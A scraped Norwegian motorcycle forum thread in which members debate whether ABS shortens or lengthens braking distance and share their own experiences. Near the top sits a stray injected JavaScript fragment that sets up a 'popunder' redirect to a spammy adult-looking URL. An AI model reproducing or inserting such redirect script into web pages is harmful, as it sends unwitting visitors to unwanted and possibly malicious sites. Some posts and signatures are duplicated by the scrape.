Fortnine kom nettopp med en ny video om ABS bremsing.
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
I tillegg står dette i bruksanvisning til alle sykler med ABS.
ABS-bremsing
- AJ
- Administrator
- Innlegg: 38006
- Registrert: 30 sep 2006, 18:46
- Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
- Sted: Lunner på Hadeland
- Kontakt:
Re: ABS-bremsing
En menings- og erfaringsutveksling hvor mange aldri blir enige, dette...
Litt som en oljetråd... .
Selv er jeg nok ganske sikker på at ABS bremser har sine klare fortrinn.
Men! det er selvfølgelig et godt og viktig poeng at man holder god avstand til forankjørende!
ABS bremsing betyr lengre bremselengde når det virkelig gjelder. Og dette bør alle har helt klart fram i frontlappen når de kjører.
Litt som en oljetråd... .
Selv er jeg nok ganske sikker på at ABS bremser har sine klare fortrinn.
Men! det er selvfølgelig et godt og viktig poeng at man holder god avstand til forankjørende!
ABS bremsing betyr lengre bremselengde når det virkelig gjelder. Og dette bør alle har helt klart fram i frontlappen når de kjører.
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
- Jompa
- Moderator
- Innlegg: 6993
- Registrert: 08 jan 2011, 14:52
- Motorsykkelen din: Triumph Sprint GT 1050
- Sted: Alta
Re: ABS-bremsing
Hvor mye lengre?
Litt lengre bremselengde er uansett i de fleste tilfeller bedre enn låste hjul med stor sjanse for velt.
De fleste av oss trener vel aldri på maksimal oppbremsing og vil uansett få lengre bremselengde uten abs enn panikkbremsing med abs.
Litt lengre bremselengde er uansett i de fleste tilfeller bedre enn låste hjul med stor sjanse for velt.
De fleste av oss trener vel aldri på maksimal oppbremsing og vil uansett få lengre bremselengde uten abs enn panikkbremsing med abs.
De svake øyeblikkene er de beste øyeblikkene.
-
OnlineSveinHa
- Innlegg: 396
- Registrert: 09 mai 2023, 23:46
- Motorsykkelen din: BMW R1100RS 1993
- Sted: Carten Island
- Kontakt:
Re: ABS-bremsing
Jeg vet i alle fall at ABS ha berget med en gang i bil. Når katastrofen er like foran sliter nok jeg med å løsne bremsen litt og låst framhjul på sykkel er absolutt ikke noe stas...
Er du proff racingfører klarer du å bremse en del bedre enn ABS men for folk flest er det nok en annen historie...
Er du proff racingfører klarer du å bremse en del bedre enn ABS men for folk flest er det nok en annen historie...
Litt om meg og mitt (der er fremdeles noen som er så gamle at de har hjemmeside i stedet for alskens usosiale medier): http://www.sveinha.com/
Mine kjøretøy pr i dag: "NittiNitti": -90 Land Rover 90, "Bimbo": -93 BMW R1100RS, "Helmut": -08 Knaus Sunliner 808
Mine kjøretøy pr i dag: "NittiNitti": -90 Land Rover 90, "Bimbo": -93 BMW R1100RS, "Helmut": -08 Knaus Sunliner 808
- Gammelsmurfen
- Innlegg: 1310
- Registrert: 09 nov 2020, 19:05
- Motorsykkelen din: BMW F850GS Rally 2022
Re: ABS-bremsing
Hadde ikke ABS på min forrige, låste bakhjulet av og til men det er jo uproblematisk med mindre man ikke har en del nedlegg.
Forhjul ville det ha vært verre med... etter den elg-episoden (som gikk helt fint), så gjorde jeg meg noen tanker.
Nå har jeg ABS Pro med G-sensor som tar høyde for om man har nedlegg/er i sving og vil redusere bremsekraften for å unngå at sykkelen vil reise seg og du kjører rett ut i yttersving.
Virkningen varierer med kjøremodusene og jeg kan evt. skru det helt av i Enduro Pro modusen, kan være et pluss på nyskrapet eller nygruset grusvei, ellers blir det stående på.
Forhjul ville det ha vært verre med... etter den elg-episoden (som gikk helt fint), så gjorde jeg meg noen tanker.
Nå har jeg ABS Pro med G-sensor som tar høyde for om man har nedlegg/er i sving og vil redusere bremsekraften for å unngå at sykkelen vil reise seg og du kjører rett ut i yttersving.
Virkningen varierer med kjøremodusene og jeg kan evt. skru det helt av i Enduro Pro modusen, kan være et pluss på nyskrapet eller nygruset grusvei, ellers blir det stående på.